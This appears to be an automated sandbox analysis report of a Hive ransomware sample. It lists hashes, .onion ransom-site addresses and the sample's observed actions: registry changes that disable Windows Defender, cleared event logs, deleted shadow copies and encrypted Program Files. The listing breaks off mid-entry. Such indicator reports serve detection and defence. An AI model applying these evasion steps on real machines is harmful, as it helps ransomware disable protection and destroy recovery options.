Analysis
-
max time kernel
31s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20250207-en -
resource tags
arch:x64arch:x86image:win7-20250207-enlocale:en-usos:windows7-x64system -
submitted
12/03/2025, 01:39
Static task
static1
Behavioral task
behavioral1
Sample
2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
Resource
win7-20250207-en
Behavioral task
behavioral2
Sample
2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
Resource
win10v2004-20250217-en
General
-
Target
2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
-
Size
2.6MB
-
MD5
78fb5aaf33ba7bc649c3896f0be1c94b
-
SHA1
7369fa3e614595cb02ca09b3c8472a7258d569e1
-
SHA256
c15f267a2f8728cda84ae89122d07f706a92e23154bbb4b99e07892ae94ce083
-
SHA512
dfa459ab1e493251de0f0f0beba0e709b68c8da41e8a36c945df39f209f15f220d2e1db87fb4ff666c61b11e5e2591912fdb08e2de87171e8cf8147d8d298c22
-
SSDEEP
24576:LSWJv2CcnkpG1pSh6WFCTfqX9XyLpwE0D3modZ7GE+rcrVoPETgDqhCi1EbGTkSm:L/uEXTdZT+6VfHc3qui0CwSZE701D1j
Malware Config
Extracted
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\pK8K_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
pid Process 2416 MpCmdRun.exe -
Disables service(s) 3 TTPs
-
Hive
A ransomware written in Golang first seen in June 2021.
-
Hive family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" reg.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs 3 IoCs
pid Process 2616 wevtutil.exe 776 wevtutil.exe 1984 wevtutil.exe -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
pid Process 1936 powershell.exe 2904 powershell.exe -
Modifies Security services 2 TTPs 6 IoCs
Modifies the startup behavior of a security service.
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SecurityHealthService\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdBoot\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdFilter\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisDrv\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisSvc\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SecurityHealthService\Start = "4" reg.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.preferences_3.5.200.v20140224-1527.jar.j3NzwqMo5al6Vdu-IK29Fd_Ecwv5WAVpvYZst8N02mr_U04ePdtLc-M0.pirxq 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145810.JPG.j3NzwqMo5al6Vdu-IK29Fd_Ecwv5WAVpvYZst8N02mr_h694hdN58LE0.pirxq 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0251871.WMF.j3NzwqMo5al6Vdu-IK29Fd_Ecwv5WAVpvYZst8N02mr_h3mStGL5fOI0.pirxq 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Oasis.css.j3NzwqMo5al6Vdu-IK29Fd_Ecwv5WAVpvYZst8N02mr_t6CodSHZ1O40.pirxq 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Sts2.css.j3NzwqMo5al6Vdu-IK29Fd_Ecwv5WAVpvYZst8N02mr_WqxH6t7JTY40.pirxq 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\Roses.htm 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\button_right_mousedown.png 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Pohnpei.j3NzwqMo5al6Vdu-IK29Fd_Ecwv5WAVpvYZst8N02mr_1PAysHuM2eI0.pirxq 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.theme.nl_zh_4.4.0.v20140623020002.jar.j3NzwqMo5al6Vdu-IK29Fd_Ecwv5WAVpvYZst8N02mr_1xSDnFwbfwY0.pirxq 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00373_.WMF.j3NzwqMo5al6Vdu-IK29Fd_Ecwv5WAVpvYZst8N02mr_iOA8mLVmrkk0.pirxq 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Apothecary.thmx.j3NzwqMo5al6Vdu-IK29Fd_Ecwv5WAVpvYZst8N02mr_9BcCAhLncfs0.pirxq 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\CONVERT\ORG97.SAM.j3NzwqMo5al6Vdu-IK29Fd_Ecwv5WAVpvYZst8N02mr__i6U8iXkihY0.pirxq 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\UrbanLetter.Dotx.j3NzwqMo5al6Vdu-IK29Fd_Ecwv5WAVpvYZst8N02mr_76VRY8rzhbY0.pirxq 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\MpEvMsg.dll.mui 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\ja-JP\js\timeZones.js 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\Gadget_Star_Empty.png 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\de-DE\js\cpu.js 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\fr-FR\gadget.xml 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-fallback_ja.jar.j3NzwqMo5al6Vdu-IK29Fd_Ecwv5WAVpvYZst8N02mr_vutt87Ljmj40.pirxq 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.SYD.j3NzwqMo5al6Vdu-IK29Fd_Ecwv5WAVpvYZst8N02mr_5wIY1jnzKPw0.pirxq 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\GRPHFLT\EPSIMP32.FLT.j3NzwqMo5al6Vdu-IK29Fd_Ecwv5WAVpvYZst8N02mr_4XrZX4wvau80.pirxq 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0239965.WMF.j3NzwqMo5al6Vdu-IK29Fd_Ecwv5WAVpvYZst8N02mr_fnCtKiFf_b40.pirxq 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Swirl\header.gif.j3NzwqMo5al6Vdu-IK29Fd_Ecwv5WAVpvYZst8N02mr_VEXDwZkg_Ao0.pirxq 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File created C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\CANYON\pK8K_HOW_TO_DECRYPT.txt 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Outlook.en-us\OutlookMUI.XML.j3NzwqMo5al6Vdu-IK29Fd_Ecwv5WAVpvYZst8N02mr_EH1ptlzaPwc0.pirxq 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01852_.WMF.j3NzwqMo5al6Vdu-IK29Fd_Ecwv5WAVpvYZst8N02mr_0HEA-CKi8kE0.pirxq 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE04050_.WMF.j3NzwqMo5al6Vdu-IK29Fd_Ecwv5WAVpvYZst8N02mr_BNkO2QTR5YE0.pirxq 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\ADDINS\PMAILEXT.ECF.j3NzwqMo5al6Vdu-IK29Fd_Ecwv5WAVpvYZst8N02mr_6JD5h4h0F440.pirxq 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsBlankPage.html.j3NzwqMo5al6Vdu-IK29Fd_Ecwv5WAVpvYZst8N02mr_Ko7bg-eDATc0.pirxq 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\FLASH.NET.XML.j3NzwqMo5al6Vdu-IK29Fd_Ecwv5WAVpvYZst8N02mr_DmvstV4HUwo0.pirxq 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\de-DE\IPSEventLogMsg.dll.mui 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\DataMatrix.pmp.j3NzwqMo5al6Vdu-IK29Fd_Ecwv5WAVpvYZst8N02mr_9FoadsnuoqE0.pirxq 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SKY\SKY.INF.j3NzwqMo5al6Vdu-IK29Fd_Ecwv5WAVpvYZst8N02mr_73OIzR-SAjw0.pirxq 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0151045.WMF.j3NzwqMo5al6Vdu-IK29Fd_Ecwv5WAVpvYZst8N02mr_nqD_GRigSl80.pirxq 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\Dotted_Lines.emf 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\es-ES\InkObj.dll.mui 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\Mso Example Intl Setup File A.txt.j3NzwqMo5al6Vdu-IK29Fd_Ecwv5WAVpvYZst8N02mr_7IIbozVJxYg0.pirxq 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\attention.gif.j3NzwqMo5al6Vdu-IK29Fd_Ecwv5WAVpvYZst8N02mr__13npRfQc8s0.pirxq 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Slate\TAB_OFF.GIF.j3NzwqMo5al6Vdu-IK29Fd_Ecwv5WAVpvYZst8N02mr_piTJJJbsJm40.pirxq 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL089.XML.j3NzwqMo5al6Vdu-IK29Fd_Ecwv5WAVpvYZst8N02mr_ozbu4zshVSA0.pirxq 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\it-IT\js\weather.js 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Java\jre7\lib\security\local_policy.jar.j3NzwqMo5al6Vdu-IK29Fd_Ecwv5WAVpvYZst8N02mr_48vumC2D7TU0.pirxq 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00625_.WMF.j3NzwqMo5al6Vdu-IK29Fd_Ecwv5WAVpvYZst8N02mr_f5Q1vvPBhGg0.pirxq 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\TaskbarIconImages256Colors.bmp.j3NzwqMo5al6Vdu-IK29Fd_Ecwv5WAVpvYZst8N02mr_4h2y5zqb-IE0.pirxq 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\ADRESPEL.POC.j3NzwqMo5al6Vdu-IK29Fd_Ecwv5WAVpvYZst8N02mr_YOIFJBUJts00.pirxq 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp.j3NzwqMo5al6Vdu-IK29Fd_Ecwv5WAVpvYZst8N02mr_6-WX_Wmqjyc0.pirxq 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0183198.WMF.j3NzwqMo5al6Vdu-IK29Fd_Ecwv5WAVpvYZst8N02mr_QWn6WMoT67k0.pirxq 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\CATALOG.XML.j3NzwqMo5al6Vdu-IK29Fd_Ecwv5WAVpvYZst8N02mr_jBQDgoFPm4A0.pirxq 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-modules.xml.j3NzwqMo5al6Vdu-IK29Fd_Ecwv5WAVpvYZst8N02mr_kakWKR3EBjk0.pirxq 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\MSInfo\en-US\msinfo32.exe.mui 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.httpcomponents.httpclient_4.2.6.v201311072007.jar.j3NzwqMo5al6Vdu-IK29Fd_Ecwv5WAVpvYZst8N02mr_VSASF4uxR_00.pirxq 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-options-keymap.xml.j3NzwqMo5al6Vdu-IK29Fd_Ecwv5WAVpvYZst8N02mr_keCJx3M77Xo0.pirxq 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Word.en-us\SETUP.XML.j3NzwqMo5al6Vdu-IK29Fd_Ecwv5WAVpvYZst8N02mr__NAXOxfBD8E0.pirxq 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14830_.GIF.j3NzwqMo5al6Vdu-IK29Fd_Ecwv5WAVpvYZst8N02mr_dxX4GQZj02Y0.pirxq 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\MEDIA\HAMMER.WAV.j3NzwqMo5al6Vdu-IK29Fd_Ecwv5WAVpvYZst8N02mr_vBCb8kUY8ys0.pirxq 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0239973.WMF.j3NzwqMo5al6Vdu-IK29Fd_Ecwv5WAVpvYZst8N02mr_fKF-jYY-P-A0.pirxq 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Full\NavigationRight_SelectionSubpicture.png 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-previous-over-select.png 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\specialmainsubpicture.png 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr\default.jfc.j3NzwqMo5al6Vdu-IK29Fd_Ecwv5WAVpvYZst8N02mr_HTWOfFg35kE0.pirxq 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.win32.nl_ja_4.4.0.v20140623020002.jar.j3NzwqMo5al6Vdu-IK29Fd_Ecwv5WAVpvYZst8N02mr_YlEF8ZUBOus0.pirxq 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Omsk.j3NzwqMo5al6Vdu-IK29Fd_Ecwv5WAVpvYZst8N02mr_VnjM-fFIe3Q0.pirxq 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Microsoft Games\SpiderSolitaire\it-IT\SpiderSolitaire.exe.mui.j3NzwqMo5al6Vdu-IK29Fd_Ecwv5WAVpvYZst8N02mr_UsAhyuE0X-A0.pirxq 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe -
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2768 sc.exe 2740 sc.exe 2956 sc.exe 3016 sc.exe 2964 sc.exe 2952 sc.exe 2812 sc.exe 2712 sc.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vssadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened 